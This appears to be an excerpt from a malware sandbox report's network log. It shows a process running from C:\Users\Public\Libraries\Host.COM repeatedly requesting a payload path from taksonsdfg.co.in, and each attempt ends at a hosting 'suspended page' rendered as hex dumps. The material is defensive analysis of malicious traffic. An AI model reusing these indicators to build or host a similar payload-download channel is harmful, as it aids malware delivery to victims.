                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:40 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.749787108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:41 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:41 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:41 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:41 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:41 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.749794108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:43 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:44 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:43 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:44 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.749799108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:45 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:46 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:46 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:46 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:46 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.749806108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:48 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:48 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:48 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:48 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.749812108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:49 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:50 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:50 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:50 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:50 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.749819108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:52 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:52 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:52 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:52 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.749825108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:54 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:54 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:54 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:54 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:54 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.749832108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:56 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:57 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:38:56 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:38:57 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.749838108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:38:58 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:38:59 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:38:59 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
